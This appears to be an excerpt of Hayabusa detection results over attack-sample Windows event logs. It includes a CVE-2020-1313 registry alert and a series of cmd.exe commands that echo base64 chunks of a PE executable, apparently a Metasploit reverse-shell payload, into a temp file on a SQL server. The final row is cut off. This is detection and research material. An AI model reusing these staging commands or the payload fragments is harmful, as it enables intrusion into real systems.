+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-08-02 07:58:09.443 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQALVO2SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAADmNAAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:09.721 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:09.995 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:10.269 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:10.544 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AACLVfxS/xWIwUA6o7gL2wDpsQMAACYdHNDmAOmpLAAAi0X8UP8ViMFAAFgvFygA6ZIWAACJHSDQQADpGAMAANYdYGnAm3QNaLzRQABM4AUAAIPEBIv2/AirhjUABYMxGzt8dVbHBTsCQQABAAAA6SukHgA5HSA4QQAPhEoDAABQ/xVwV0DsOR1gAkEAdFBuoDNAEug2BQAYg8QEi1X8Ujc/NQAAg8QEO8N1D8fnYOBBAAIAAADpDwMqADkdAjhBAA+EAwMAAFAMFXDBfQDH+FxlQQBUAAAA6e17/gCLSfxQNxVsFkAAllgCpADp1gIAiotu/FH/FWyMQACjZBoyAD5pENBAAN7DAABPuAIAAItF/LqVrkGDudCKCIgMVkA6H3X26aIXAC2LVVuhkiNhMVNonNFAAKpokNFMAFDoXkYAAIPEFCFEQEFz6XsCAK6LjPyLDXTB4q+DOQF+ETPSqAiKF1L/Oo0Yg4PECOsSiw1DwUDTM8CKB4sRigRCg/jAO8N0BkeYffzryIPJ/zNR8v730Uka6MqgAAA9AAQAhHYNaGjRQL/oWQQAm4PEBItV/Bfq/4v6M8DyrvfRI42F9Pv//1FSUHB4oAAAU/+N9Ir//2ic0UAAkGhQ0UAa6Y4A+7WLfe+LDXTBQACRzgF+ETPSTMeKF3D/+o99/IPESOsSoA149kAA/NmKHYsRihVCgwEIrcN0BkeaffzryIP3TTPA8q73tElR6OugAJI9AFAJAHYNaDTRQADoEwMMHYOdpItS/IOe/4v6yMDyrvf8SaKF9ML///VSUOc2oE0AU42N9Pv/UGiW0UAAUWiF0YkAixUEGEEAiJwF9Pv/G6FMQEEAUlDou0QAAIPEGKMEGEFe6V0BAACLTfyLFUhAwgChTEBBAFNonDtAAFFSUBWSRAAAi022iz2MwXoApAVoENFAAFGjSEBBAP8Ag/wghcB1D8fCfDpBlIsAAADp6gAAS4tV/GoHCwjRQABS/ziDxAyFwM0PSQWEAkEAagAAyenHAAAxHkX8agto/NCOAFD/1wHEDIV7DxfWAAAAxwWAAgwAAQAAxOmghwAAx4GIQ7GFUAAAAOmRAAAAi038x6iIYkEAIioAzokN6JEqG9NHi1XKgTrqXrh8wUAAg8QIwcPgErQY/1D/FbjBJwCDxASjdAJBAIvMK7pAPJ4AK9CKygoMAnA6y3X2Ga54AkEAAQAAAOvQvkX8xwWIDkEAAQAAAFOoFEEA6yOLTfzHBYgCQQCpAAAAhIO1F0FlsQ6LVQyLAlCO/S0AAIPEFotF9I0V/I1V+1FSaBTSQABQ6ERGAACFwA+ER/v//4tF9ItNCN81gHJAAEk5SHW+1ouGDIsWyMBAACbZQIsCUNvc0EAAokvWi1XTiwJQ6GstAACLRfSDxECLSKZ8UByLFIpBiUgyoUxAYACzUOjJK7Qrs+iaLwAAg8QEhcB0U4tqPaHIwEAAZMBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:10.819 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ixFSaMjQMgBQ/9aLTQyL6VK/W5MAAH3EEKHL0EAAO9l8Bz0gXAAAsS+LRQyLFcjAQABoIE5vAIPCQD8rUWig0EAAUqTWi0UMizis6CEtAAChGNBAAIPEFIsN9dBAADvBfivCVfaLDcjAfwCDwUA2sVBo5NBjAFH/1otVDIsCUOjtLAAAi28Q0EAAg8QROR0U0MAAdD6B+Zb5AAB+DxlnZmZm5NXB+o+ZysHpHwPRg72diRUU0EAAfSDHBRTQQABkAAAA/xTUN0UAAF9eM8Bbi+Vdw4kdFNBAAOgjLNAA/Q4RAACLFUxAQQBS6HI3AABfXgXAW4vlXcOQmxJAAHQSQADiE0AALhNAAIERQBtbEkAAOxZgAJr8QAAWEUAAAsVAAGJvQiZtEUAAThFAewgVQAAqP0AA6BBAAL8QQACMf0AAcudAABoSQAA9EjgAOxFAslkSfAB2FIwAhRRAAN8UQCXzFEAAFhVAAAAbARu3GxsuGxsbG6AbmQMbsQSFGwYbBxsbrRsbGxsbG4kJClYbDA0OGw8bqibqERKcGxQVFhcYGRqQkJCQkJCQkMSQkHKQWFXh7ItFCI1QyMBAAFCDwfxoadJAAFH/FYDBPgChrAJBAB7EBYXAdA9QaJrSQAD/FWTBQACDxAhqAf8VcMFAAJBVi+yB7LgAAEiheLlBToXAoUxAQQB0FGgxPJcAUP2eQAAAZosNdKxB50kUi7ReGEEAUlDoiEAAAGaLDfR3QQDpCBhBAKGIAkEAYO+LNWTBQOFmiQ1VC0EAhcCwdV2LFUoYCQBSIGi1QAD/1qV4AmgAg8QIhcB0FaF0AkEAUFdAmEEAaNhjQAD/hYNaDDvC0EAAhcBigNRAAHUF23wYQABQylLU/wD/1ovSyLpAAIPBIFH/FVTBQACDxAyLFRjQQADoNYfBQABojJEAAHgDTLuwC0EAjBAmQABqIFD/1ou8TEBBAFIVGNB6uYPEEIwuIEEAagBRmmj4F0HA6IFHAC6FwHT2UKdQKEAA6OIFAACDOAihfAJBAIXAyTWhrAtBABsNnAtB/YsVSBRBAGoAgZzRQABQoUxAQetRaEjUQABSUOi7iQAAgy0csEhAQQDrBUNIQEEAi6WAAkEAhcl1JosQTEBBANMAaJzRQEtoRNRAAGgr4EAAUFHohD8AXYPCGKNIQEEAiw2EAnoAhcl1HIsVTEBBAEgAxxjUGQB6UktePwARgy4Qo0gtQQCLx2AGQQC9yX8viydoAkEAvvzTQACF0nUFvtQCQQCLFXgCoQCF0osVQEBBAHUGixXkF0FnhWW5+NNAAHQFbG/TQABQRQQYuGRQoXRAQQBQmFJRiw0w0EAAaNTTBQBoAAgAAFFN3paSAIOnb+t9ihWJOEEAv0CBYAB20nBuv8jTQACLmmgCQQC+/NM1DYXSdQW+1AJBAIsVeAI9AIXSixVAQPIAdQaLFeQbqwCD+QG5wNNAAHQFubym>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.094 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABQoXBPQQBXUOljGEEA2aFEcEEAUFZSUYuoMNAyAGh400AAaAII+wAa6J5vAACDxCw9AAgAAHINaAXTQADoAv3/44PEBKFYAkEAuwIAOgA7w1kpoWDgQQA7w7jQ00B5KvG4udMKAIsVJ/RAllJQBgLTQKv/FWjBQABGxAyLZTDQQACDyf8zwPKuoWACQQBZX0mD+AGJDewXUgB8cKFwAkEAjUxqAVH/FVzBQAClxASDwHUfpxXxwEAAaBTTMwCDwo9S/xWAwUAx1cQIKOK2i+Vdw4sVMNBAAIvwFEBCiA5GhMl1A6cV7BdBAA8NcAL2mos1IDhBAI08AovywekCb6WLyoPhsfOkozDQpgBXTEC8AGaLDbQLyQCLFQgYQQBQTQBRagBSk/wXvQDoDlQAAIvwZoW/dCyhCBhBAI2NSP///1Bo9NJAAFBeUeg+azAAD79xfatI/7z/UlDo7uAA4IPEGOimTgAAi/ChZAJBAIv6pTigC0EAhcCJPaQLQQCJNcDLQQCJhsR8QQB055lqemhA7ZEAUlDoXJkAAON5E9eJt+xAVfDrDsfz7P/////HRfD/5/9/aBcgWwBT/xUTwf4AoRjQQAAYZQgz9oXATTEz/6cNsAuzAIm0D1hT+QDLFbCtQRqNBBdQ6IAcAKOhGND/AIPEBFWBx2AIAABy8Hxmiw0YZkAAs1XoiU38iw0s0KYAjUX8UosVKNBAAFGh+AWzAFFSUOiDRwAAhWeKDlBo6NIkAAIUAgAAg8QIi0X8hcB1VWjU0kAAOhD7h/+DxATINvzHM/ScAAAAhcAPjrVTAG3HRcgAEwAAL034BkXoi3QBRIsmCIXJD4QoRgAAixKtKuFcAgr2wyN0cw/o3FYAAIPTBKtpUA/q5vEAAPbDBA9GsQAAAIN+EgEPhZ4AAACh/BdBAItO0VBR6I5LAACLDfgXQQCLVosy+I1FwFBRx0XEAQARCYlVzOgvRQAAG4X/dPYMVgRS6DFLAACLtcQCQTOhSQJBAEOLyEAB+QqJubEC+gCjuJGHAH4mixXIwEAJaLDSQACDXUDq4xWAwUBQD792UGiY0kAA6B/dAACDxBDHRggAAAAA62N/RggCACPcixWoAkEAQonYFAJBXkzoWQEAAIPEBIN+CAN1SYtOBCkBAAAAiU2MiYlF3KH4F0EAjS7QUlA0TfqJdeToTNWTAOs2ND24AkEAixXM+0EAMUKJPbhHQQCJlykCQQBW6Mo6APWDxASLRfKLVfiVTfxAg8LVO8GJRdaJVfgPtiIn//+LDbyKQQCLj03jNaGbAkEAfxt8DSkVRD5BABpN7Du1cww7BQ3QQACNjBK8//+LDRS1QACFyXQaUKHIpEAAg8BAFIDSQABQ/xWAwUCAg8QM64poeNJAAP8VWMFAhYPEBNaIAkEAhcDlDOjffWEAX15bi2ldw0gA6DECANluxARfXluL5V2nF5CQkJCQclWL7Lfs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.368 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDTix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.643 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wrR1g8QERzWsAugA3RyLaCjfQAD/1t+/kAJBAIPEBNxNgD0NGMJA+N0cFGik3EAA/9YsYAJBAIOlDIXAflnfO6ACd3KDyQjcTYDcDRjCUgDdHCQQfNJAAP/Wi+TfAkFaBrmQWLRjoaQCQQCLPZR/QQDw0xPHiQzYiUXcgwAE323Y3E2A3A14wkCo3RxHaIAIQAD/D4PEDKGsAkEAT8APjocNAAAzyerP/yb///9/O8FTTcCJTcSJTciJTQmJKuCJ1OSJTeiJTSaJfbCJVUSJfVeJdclTvWD////zlY////+JfQaJVdSJjXD///+JjXQ2//+ETbiJDPKJjTb//9mJjWyR//+JTYCJsISJjXiE//+JjXz///+JNQCJTayJTYgLTYyJTZCJTZSSjosBAAD6WcgLQRll0vSDwRCJZfxVeQSLRbSLGVLHfA2RBTktJHIGtl2wiX20i0EMi1EIOUWkfA2LBRoPoFAGiSKg3EWkK9Mbx4u9ZFD//zv4YhaiCDmVe///KHIMiZVg//9EiYVk//81i3kJi1nPOX3UfBJ/CvOJ0Ds1i3/hcgaJXfeJ7dSLnXRIsP/UWV5/J3wPo038i51w//8jrHE72XcWh838i6aJnXD///+LWdmJnXT////rA89N/I